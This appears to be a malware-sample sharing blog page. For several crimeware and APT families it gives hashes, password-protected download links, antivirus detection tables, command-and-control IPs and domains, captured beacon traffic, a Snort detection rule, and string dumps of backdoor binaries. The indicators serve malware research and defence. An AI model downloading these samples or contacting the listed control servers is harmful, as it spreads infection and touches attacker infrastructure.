Channel: contagio malware exchange

020 Crime Ramnit Rootkit - web - May 10, 2012


Sample credit - Artem Baranov and Hendrik Adrian

Research:

 
Download (pass infected)


Size: 135680
MD5:  607B2219FBCFBFE8E6AC9D7F3FB8D50E



AppData\ftaubilx\px1.tmp
AppData\obrymkdk.log
%tmp%\bledqixd.sys MD5: a6d351093f75d16c574db31cdf736153


ffmcnnwunntybhyx.exe
info.exe
narhllul.exe 

Communications
443 to 176.31.62.76

Virustotal

SHA256:     f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c
SHA1:     a7771cd3b99f7201b331323f03e2d596778b610e
MD5:     607b2219fbcfbfe8e6ac9d7f3fb8d50e
File size:     132.5 KB ( 135680 bytes )
File name:     file
File type:     Win32 EXE
Tags:     upx
Detection ratio:     37 / 42
Analysis date:     2012-04-27 11:02:44 UTC ( 1 week, 6 days ago )
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Lebag     20120426
AntiVir     TR/Offend.KD.504269     20120427
Antiy-AVL     Trojan/Win32.Gamarue.gen     20120427
Avast     Win32:Trojan-gen     20120427
AVG     Generic27.MBL     20120427
BitDefender     Trojan.Generic.KD.504269     20120427
ByteHero     -     20120424
CAT-QuickHeal     Trojan.Lebag.klg.cw3     20120427
ClamAV     Trojan.CripUnp     20120426
Commtouch     W32/Downldr2.IXID     20120427
Comodo     Heur.Suspicious     20120427
DrWeb     Trojan.Rmnet.8     20120427
Emsisoft     DDoS.Win32.Dofoil!IK     20120427
eSafe     -     20120425
eTrust-Vet     Win32/Dofoil.A!generic     20120427
F-Prot     W32/Downldr2.IXID     20120426
F-Secure     Trojan.Generic.KD.504269     20120427
Fortinet     W32/Lebag.A!tr     20120427
GData     Trojan.Generic.KD.504269     20120427
Ikarus     DDoS.Win32.Dofoil     20120427
Jiangmin     Trojan/Gamarue.bx     20120427
K7AntiVirus     Riskware     20120427
Kaspersky     Trojan.Win32.Lebag.klg     20120427
McAfee     Generic.il     20120427
McAfee-GW-Edition     Generic.il     20120426
Microsoft     Trojan:Win32/Ramnit.A     20120427
NOD32     Win32/Ramnit.A     20120427
Norman     W32/Krypt.CI     20120427
nProtect     Trojan/W32.Agent.135680.LI     20120427
Panda     Trj/Agent.NOK     20120427
PCTools     Trojan.Generic     20120424
Rising     Trojan.Win32.Generic.12AF6823     20120427
Sophos     -     20120427
SUPERAntiSpyware     -     20120402
Symantec     Trojan Horse     20120427
TheHacker     Trojan/Lebag.klg     20120426
TrendMicro     TSPY_SINOWAL.WC     20120427
TrendMicro-HouseCall     TSPY_SINOWAL.WC     20120427
VBA32     Trojan.Lebag.klg     20120427
VIPRE     Trojan.Win32.Generic!BT     20120427
ViRobot     -     20120427
VirusBuster     Trojan.Lebag!yEp9NXlqXHc     20120427

Also found on BH EK 173.237.198.42
Posted 3 months, 3 weeks ago by Kafeine
BH EK 77.72.129.68
Posted 3 months, 3 weeks ago by Kafeine
This is one of the Ramnit Worm malware samples detected between 1st January 2012 and 6th January 2012.

Analyzed in the analysis reports written below:





Binary Analysis: http://mcaf.ee/r6qb5 (Translated from Japanese)

Dynamic Analysis (1) & (2) : http://mcaf.ee/7y46s & http://mcaf.ee/cf0jw (Translated from Japanese)

Overall Latest samples & Analysis: http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html#more



Hendrik ADRIAN (VT/Twitter: @unixfreaxjp)

ZeroDay Japan http://0day.jp

Blog: unixfreaxjp.blogspot.com
Posted 3 months, 3 weeks ago by unixfreaxjp
Below are the current reports:

The static (binary) analysis first-hand report is here:
http://pastebin.com/iNxP8GTR

The dynamic (behavior) analysis first-hand report is here:
http://pastebin.com/JJ5zuTh1


Last notes:
Received the same sample as sent by contagio.
It sent an encrypted packet to the remote host, non-SSL, over port 443. Tried decrypting it in many ways... still can't tell.
The encryption key is suspected to be injected into the registry; see dynamic analysis line 228 (Windows registry).
Outbound links go into the sinkhole, please check if any are left.
I am Ollying the sample for more info now...

021 Crime TDL - web - June 4, 2012

022 Crime Win32/Bakcorox.A - proxy bot - web - June 7, 2012


Download (pass infected)


pcap file



DNS query:  day7read.info
DNS response:  day7read.info ⇒ 74.207.249.7
Connects to:  day7read.info:443 (74.207.249.7)
Sends data to:  8.8.8.8:53
Sends data to:  day7read.info:443 (74.207.249.7)
Receives data from :  8.8.8.8:53
Receives data from:  day7read.info:443 (74.207.249.7)
 
Traffic
GET favicon.ico HTTP/1.1
Host: bcProxyBot.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.2.0)
Cookie: 0800277B8CC8admin-0b1297ec9

........
SHA256:     edcfde456995f0d5804e5842a460c72d8a806d0f1b76cfdbea4cc414823c57e3
SHA1:     91c4147f6b62ef5e08bc08ee6788282cb7745afc
MD5:     ff705b746d30a8ba3cab5837cc58c3f7
File size:     14.0 KB ( 14336 bytes )
File name:     FF705B746D30A8BA3CAB5837CC58C3F7
File type:     Win32 EXE
Tags:     armadillo
Detection ratio:     29 / 40
Analysis date:     2012-04-30 20:20:32 UTC ( 1 month, 1 week ago )
Antivirus     Result     Update
AhnLab-V3     Trojan/Win32.Hupigon     20120430
AntiVir     TR/Dldr.Flexty.A.32     20120430
Antiy-AVL     Trojan/Win32.Coco.gen     20120430
Avast     Win32:Bakcorox [Trj]     20120430
AVG     BackDoor.Generic15.EEP     20120430
BitDefender     Gen:Variant.Zusy.Elzob.1921     20120430
ByteHero     -     20120424
CAT-QuickHeal     TrojanProxy.Coco.r     20120430
ClamAV     -     20120430
Commtouch     -     20120430
Comodo     UnclassifiedMalware     20120430
DrWeb     Trojan.Proxy.23500     20120430
Emsisoft     Trojan-Downloader.Win32.Flexty!IK     20120430
eSafe     Win32.TRDldr.Flexty     20120430
eTrust-Vet     -     20120430
F-Prot     -     20120430
F-Secure     Gen:Variant.Zusy.Elzob.1921     20120430
Fortinet     W32/Coco.E!tr     20120430
GData     Gen:Variant.Zusy.Elzob.1921     20120430
Ikarus     Trojan-Downloader.Win32.Flexty     20120430
Jiangmin     TrojanProxy.Coco.m     20120430
K7AntiVirus     Proxy-Program     20120430
Kaspersky     Trojan-Proxy.Win32.Coco.r     20120430
Microsoft     TrojanDownloader:Win32/Flexty.A     20120430
NOD32     probably a variant of Win32/TrojanProxy.Bakcorox.A     20120430
Norman     W32/Proxy.AA     20120430
nProtect     -     20120430
Panda     Generic Trojan     20120430
PCTools     -     20120430
Symantec     Backdoor.Trojan     20120430
TheHacker     Trojan/Proxy.Coco.r     20120428
TrendMicro     TROJ_GEN.R47CCCJ     20120430
TrendMicro-HouseCall     TROJ_GEN.R47CCCJ     20120429
VBA32     TrojanProxy.Coco.r     20120430
VIPRE     Trojan-Downloader.Win32.Flexty.a (v)     20120430
ViRobot     -     20120430
VirusBuster     Trojan.PR.Coco!FNKo1kplNQ4     20120430


ssdeep
384:6qg+/QsTq1PELRURctEb+hq9LuIYAAMBk1OFs:/3mZELSuA+ILt4OF
TrID
Win32 Dynamic Link Library (generic) (65.4%)
Generic Win/DOS Executable (17.2%)
DOS Executable Generic (17.2%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)
PEiD packer identifier
Armadillo v1.71
ExifTool

MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2012:03:10 18:22:38+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 9216
LinkerVersion............: 10.0
EntryPoint...............: 0x3151
InitializedDataSize......: 4096
SubsystemVersion.........: 5.1
ImageVersion.............: 0.0
OSVersion................: 5.1
UninitializedDataSize....: 0

Portable Executable structural information

Compilation timedatestamp.....: 2012-03-10 17:22:38
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00003151

PE Sections...................:

Name        Virtual Address  Virtual Size  Raw Size  Entropy  MD5
.text                  4096          9014      9216     6.21  2012cebb7ee205fd627a5fe9e602516f
.rdata                16384          1510      1536     4.70  fa78d5393417f7bc7f38042f77199c10
.data                 20480          1172      1536     5.20  18d9f243bc24f2f360a24bb5124cc565
.reloc                24576           808      1024     4.72  ca9a78f5f11bcc7c89a0fd94d13a70f3

PE Imports....................:

IPHLPAPI.DLL
    GetIfTable

ADVAPI32.dll
    RegisterServiceCtrlHandlerW, SetServiceStatus, StartServiceCtrlDispatcherW

KERNEL32.dll
    CreateEventW, GetTickCount, GetTempPathA, SetEvent, WaitForSingleObject, CreateThread, CloseHandle, GetModuleFileNameA, GetModuleHandleA, GetStartupInfoA, Sleep

MSVCRT.dll
    fopen, fwrite, fclose, _errno, _exit, strstr, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, memcpy, atoi, isspace, strchr, strncmp, malloc, free, sprintf, _XcptFilter, memset

SHELL32.dll
    ShellExecuteA

WS2_32.dll
    -, -, -, -, -, -, -, -, -, -, -


PE Exports....................:

strdup

First seen by VirusTotal
2012-03-18 20:22:11 UTC ( 2 months, 2 weeks ago )
Last seen by VirusTotal
2012-04-30 20:20:32 UTC ( 1 month, 1 week ago )
File names (max. 25)

    ff705b746d30a8ba3cab5837cc58c3f7.exe
    FF705B746D30A8BA3CAB5837CC58C3F7

023 Crime Downloader Trojan (name?) - web - June 7, 2012

Audio_Recording_MP3
MD5: FDC170166CB958E138E7D401F3C6F896
SHA1: A3253B1732A50146038A68B3B46260F80BEC6C1C

Download (pass infected)

pcap file






Audio_Recording_MP3.exe
Creates: c:\Documents and Settings\Administrator\Local Settings\Application Data\blbljsqp.exe  (file name random)
Value changes: HKCU\software\microsoft\windows\currentversion\explorer\shell folders[local appdata]

GET /gley/index.php?r=gate&id=e81b9088&group=30.05.2012&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: krasguatanany.ru

HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Thu, 07 Jun 2012 16:09:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Connection: keep-alive
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /gley/index.php was not found on this server.</p>
<hr>
<address>Apache/2.2.16 (Debian) Server at krasguatanany.ru Port 80</address>
</body></html>



ET signature discussion

Nathan Fowler | 8 May 17:45
Re: Create Signatures

On 05/08/12 09:40, Phil Robinson wrote:
> hxxp://bing[.]com/afyu/index.php?r=gate&id=[N]&group=[D]&debug=0
> hxxp://twitter[.]com/nygul/index.php?r=gate&ac=[N]&group=[D]&debug=0
> hxxp://fb[.]com/dwrgh/index.php?r=gate&fg=[N]&group=[D]&debug=0
> hxxp://google[.]com/efwgh/index.php?r=gate&cc=[N]&group=[D]&debug=0
> hxxp://everkosmo2012[.]ru/ab/index.php?r=gate&id=[N]&group=[D]&debug=0
>
> I was unable to find any existing signatures. Can someone help? Thanks.....

Looks like here's an example,

http:// everkosmo2012.ru/ab/index.php?r=gate&id=00cd1a40&group=20.04.2012&debug=0

Not sure what this is called though,

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - Check-in Not sure what this is called"; flow:established,to_server; content:".php?r=gate"; http_uri; fast_pattern; content:"&group="; http_uri; distance:0; content:"&debug="; http_uri; distance:0; classtype:trojan-activity; sid:x; rev:1;)

https://www.virustotal.com/file/1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4/analysis/

SHA256:     1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4
SHA1:     a3253b1732a50146038a68b3b46260f80bec6c1c
MD5:     fdc170166cb958e138e7d401f3c6f896
File size:     53.0 KB ( 54272 bytes )
File name:     1338806789.Audio_Recording_MP3-itYk.exe
File type:     Win32 EXE
Detection ratio:     24 / 41
Analysis date:     2012-06-04 10:46:37 UTC ( 3 days, 5 hours ago )

Antivirus     Result     Update
AhnLab-V3     Win-Trojan/Kuluoz.54272     20120604
AntiVir     TR/Crypt.XPACK.Gen     20120604
Antiy-AVL     -     20120604
Avast     Win32:Dropper-gen [Drp]     20120604
AVG     Downloader.Generic12.CFBJ     20120604
BitDefender     Trojan.Generic.KDV.637381     20120604
ByteHero     -     20120531
CAT-QuickHeal     -     20120604
ClamAV     -     20120602
Commtouch     -     20120604
Comodo     -     20120604
DrWeb     Trojan.MulDrop3.51893     20120604
Emsisoft     Trojan-Downloader.Win32.Dapato!IK     20120604
eSafe     -     20120603
F-Prot     -     20120603
F-Secure     Trojan.Generic.KDV.637381     20120604
Fortinet     W32/Dapato.LON!tr.dldr     20120603
Ikarus     Trojan-Downloader.Win32.Dapato     20120604
Jiangmin     -     20120604
K7AntiVirus     -     20120601
Kaspersky     Trojan-Downloader.Win32.Dapato.lon     20120604
McAfee     Generic Downloader.z     20120604
McAfee-GW-Edition     Generic Downloader.z     20120604
Microsoft     TrojanDownloader:Win32/Kuluoz.B     20120602
NOD32     Win32/TrojanDownloader.Zortob.B     20120604
Norman     W32/Troj_Generic.BZPCE     20120603
nProtect     Trojan.Generic.KDV.637381     20120604
Panda     Trj/CI.A     20120603
PCTools     Trojan.Gen     20120604
Rising     -     20120604
Sophos     Troj/Agent-WGO     20120604
SUPERAntiSpyware     -     20120602
Symantec     Trojan.Gen     20120604
TheHacker     -     20120531
TotalDefense     -     20120604
TrendMicro     TROJ_KRYPTIK.XCV     20120604
TrendMicro-HouseCall     TROJ_KRYPTIK.XCV     20120604
VBA32     -     20120604
VIPRE     Trojan.Win32.Generic!BT     20120604
ViRobot     -     20120604
VirusBuster

023 Crime OSX DNS Changer / OSX.RSPlug.A - web - 2007


SHA256:     2bdcdab0a5d41f4b6aa48e2ab55177552c8419c3f8ce140c4850a0616d7a2f3e
SHA1:     f620af9a43d6e46e6b028dc8b109ff5d4cced911
MD5:     5291beb71cba2c5779119bff7a10abdb
File size:     16.6 KB ( 17034 bytes )
File name:     ultracodec1237.dmg



 Download (pass infected)


https://www.virustotal.com/file/2bdcdab0a5d41f4b6aa48e2ab55177552c8419c3f8ce140c4850a0616d7a2f3e/analysis/
File type:     unknown
Detection ratio:     21 / 42
Analysis date:     2012-06-18 00:32:46 UTC ( 1 week, 1 day ago )
Antivirus     Result     Update
AntiVir     MACOS/Puper.A     20120617
Avast     Other:Malware-gen [Trj]     20120617
DrWeb     Mac.DnsChange     20120618
Emsisoft     Trojan.Mac.Dnscha.dmg!IK     20120618
Fortinet     Malware_fam.B     20120617
GData     Other:Malware-gen     20120618
Ikarus     Trojan.Mac.Dnscha.dmg     20120617
K7AntiVirus     Trojan     20120615
Kaspersky     Trojan.Mac.Dnscha.dmg     20120618
McAfee     OSX/Puper     20120618
McAfee-GW-Edition     OSX/Puper     20120617
Microsoft     Trojan:MacOS/RSPlug.A     20120617
NOD32     probably a variant of Win32/Agent.MSSTEQQ     20120617
Norman     RSPlug.A     20120617
PCTools     Malware.OSX-RSPlug     20120618
Rising     Trojan.Mac.Dnscha.c     20120614
Sophos     OSX/RSPlug-A     20120617
SUPERAntiSpyware     -     20120617
Symantec     OSX.RSPlug.A     20120617
TrendMicro     OSX_DNSCHAN.A     20120618
TrendMicro-HouseCall     OSX_DNSCHAN.A     20120617
VBA32     Trojan.Mac.Dnscha.dmg     20120615




COOKIES Cookiebag Dalbot strings - APT (1)

File: COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
MD5:  0c28ad34f90950bc784339ec9f50d288
Size: 151552






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichW
.text
`.rdata
@.data
----------------------snip
string too long
invalid string position
Unknown exception
(null)
GAIsProcessorFeaturePresent
KERNEL32
e+000
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#INF
1#IND
1#SNAN
CreateProcessA
Sleep
CloseHandle
TerminateProcess
WriteFile
GetPrivateProfileStringA
WritePrivateProfileStringA
CreateThread
GetStartupInfoA
CreatePipe
ReadFile
WideCharToMultiByte
MultiByteToWideChar
GetModuleFileNameA
GetLastError
KERNEL32.dll
InternetOpenW
InternetCloseHandle
InternetSetOptionW
InternetCrackUrlW
InternetConnectW
HttpOpenRequestW
HttpAddRequestHeadersW
InternetSetCookieW
HttpSendRequestExW
InternetWriteFile
HttpEndRequestA
HttpQueryInfoW
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
RtlUnwind
ExitProcess
GetCurrentProcess
GetTimeZoneInformation
GetSystemTime
GetLocalTime
GetCommandLineA
GetVersion
HeapFree
RaiseException
HeapAlloc
SetFilePointer
HeapReAlloc
HeapSize
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
GetModuleHandleA
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
CreateFileA
CompareStringA
CompareStringW
SetEnvironmentVariableA
LCMapStringA
LCMapStringW
CreateFileW
LoadLibraryA
SetEndOfFile
http://66.170.3.43:8080/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
geturl:
 perform exe success!
 perform exe failure!
performexe:
interval:
breakpointtrans
sleep:
exit
quit
content=
download
reqpath=
savepath=
upfile
command=
Reqfile not exist!
 upfile over!
.exe
no file!
download file failure!
 download over!
&FILECONTENT=
FILENAME=
ready download file !
FilePath
Circle
f.ini
File
Set-Cookie:
the url no respon!
 start Cmd Failure!
CreatePipe(echo) failed!!!
CreatePipe(cmd) failed!!!
YzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhl
Notepad.exe
Y21kLmV4ZQ==
path
Hello World!
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Location:
Content-Length:
charset=
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@

Unicode Strings:
---------------------------------------------------------------------------
(null)
hostname
clientkey
reqfilepath
command
reqfile
.html
?ID=
postvalue
postfile
.asp
POST
aaaaaaa
postdata
C:\unknow.zip
Content-Length
Set Proxy Failure!
BMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
</html>
<html>
utf-8

COOKIES Cookiebag Dalbot strings - APT (2)

File: COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
MD5:  543e03cc5872e9ed870b2d64363f518b
Size: 126976






Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich#
.text
`.rdata
@.data
---------------------------snip
string too long
invalid string position
Unknown exception
(null)
GAIsProcessorFeaturePresent
KERNEL32
e+000
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#INF
1#IND
1#SNAN
Sleep
CreateThread
CloseHandle
GetProcAddress
LoadLibraryA
GetStartupInfoA
CreatePipe
ReadFile
TerminateProcess
WriteFile
GetModuleFileNameA
GetShortPathNameA
MultiByteToWideChar
GetLastError
WideCharToMultiByte
KERNEL32.dll
InternetSetCookieW
InternetOpenW
InternetCloseHandle
InternetSetOptionW
InternetCrackUrlW
InternetConnectW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestExW
InternetWriteFile
HttpEndRequestA
HttpQueryInfoW
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
RtlUnwind
ExitProcess
GetCurrentProcess
GetTimeZoneInformation
GetSystemTime
GetLocalTime
GetCommandLineA
GetVersion
HeapFree
RaiseException
HeapAlloc
SetFilePointer
GetCPInfo
GetACP
GetOEMCP
HeapReAlloc
HeapSize
GetModuleHandleA
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
SetUnhandledExceptionFilter
IsBadReadPtr
IsBadCodePtr
GetStringTypeA
GetStringTypeW
SetStdHandle
FlushFileBuffers
CreateFileA
LCMapStringA
LCMapStringW
CompareStringA
CompareStringW
SetEnvironmentVariableA
CreateFileW
SetEndOfFile
http://66.228.132.53:80/EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
C:\unknow.zip
Content-Length
Content-Type
application/x-www-form-urlencoded
command
qwert
.asp
sleep:
exit
quit
content=
download
reqpath=
savepath=
upfile
command=
 start Cmd Failure!
Q3JlYXRlUHJvY2Vzc0E=
kernel32.dll
CreatePipe(echo) failed!!!
CreatePipe(cmd) failed!!!
no file!
download file failure!
 download over!
&FILECONTENT=
FILENAME=
Reqfile not exist!
 upfile over!
reqfilepath
reqfile
.html
?ID=
postvalue
postdata
postfile
hostname
clientkey
YzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhl
word.exe
Y21kLmV4ZQ==
path
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Software\Microsoft\Windows NT\CurrentVersion\Windows
load
.?AVexception@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@

Unicode Strings:
---------------------------------------------------------------------------
(null)
POST
AMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
</html>
<html>
utf-8
; expires=Thu, 01-Jan-1970 00:00:01 GMT

Coswid strings - APT

File: D62CD4AD2A919B6ACFA6D49D446DFFDB_svchost.exe_
MD5:  d62cd4ad2a919b6acfa6d49d446dffdb
Size: 19968

See the other MD5s below.




Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.update.sektori.org
/update.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load

Unicode Strings:
---------------------------------------------------------------------------

================
File: A4BA6540520C375875BF46CF8E19CB7D
MD5:  a4ba6540520c375875bf46cf8e19cb7d
Size: 19968

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.release.pornandpot.com
/google.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
+Mozilla/4.0 (compatible; MSIE 8.0; Win32)
%s %s
HTTP/1.1
.exe
kernel32.dll
CreateProcessA
1234567890123456
HTTP/1.1
Software\Microsoft\Windows NT\CurrentVersion\Windows
load

Unicode Strings:
---------------------------------------------------------------------------

=======================

File: 06CD694D383E4951E274878B975B5785
MD5:  06cd694d383e4951e274878b975b5785
Size: 154624

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
RichP
.text
`.rdata
@.data
.rsrc
(null)
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
CreateProcessA
CloseHandle
WriteFile
LockResource
SizeofResource
LoadResource
FindResourceA
CreateFileA
CreateDirectoryA
GetCurrentDirectoryA
GetTempPathA
SetProcessPriorityBoost
SetThreadPriority
GetCurrentThread
SetPriorityClass
GetCurrentProcess
lstrcatA
lstrcpyA
GetEnvironmentVariableA
GetShortPathNameA
GetModuleFileNameA
KERNEL32.dll
ShellExecuteA
SHChangeNotify
ShellExecuteExA
SHELL32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
TerminateProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
HeapFree
RtlUnwind
GetLastError
SetFilePointer
HeapAlloc
GetCPInfo
GetACP
GetOEMCP
VirtualAlloc
HeapReAlloc
GetProcAddress
LoadLibraryA
SetStdHandle
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
FlushFileBuffers
ATI Negative News.pdf
%s\%s
spoolsu.exe
open
\ATI Negative News
\~unzip012~
Open
 > nul
/c del
COMSPEC
!This program cannot be run in DOS mode.
cRich
.text
`.rdata
@.data
Sleep
GetShortPathNameA
GetModuleFileNameA
GetProcAddress
LoadLibraryA
GetLongPathNameA
GetTempPathA
lstrlenA
KERNEL32.dll
WS2_32.dll
RegCloseKey
RegSetValueExA
RegCreateKeyA
RegOpenKeyA
ADVAPI32.dll
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
WININET.dll
atoi
strcat
strcpy
fclose
fflush
??3@YAXPAX@Z
fwrite
memset
fopen
strrchr
??2@YAPAXI@Z
atol
sscanf
_purecall
strlen
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
rijndael
.firstwillnessclub.com
/old/google.png
cXVpdA==
Y21k
c2xlZXA=
dW5zdXBwb3J0
Y29ubmVjdA==
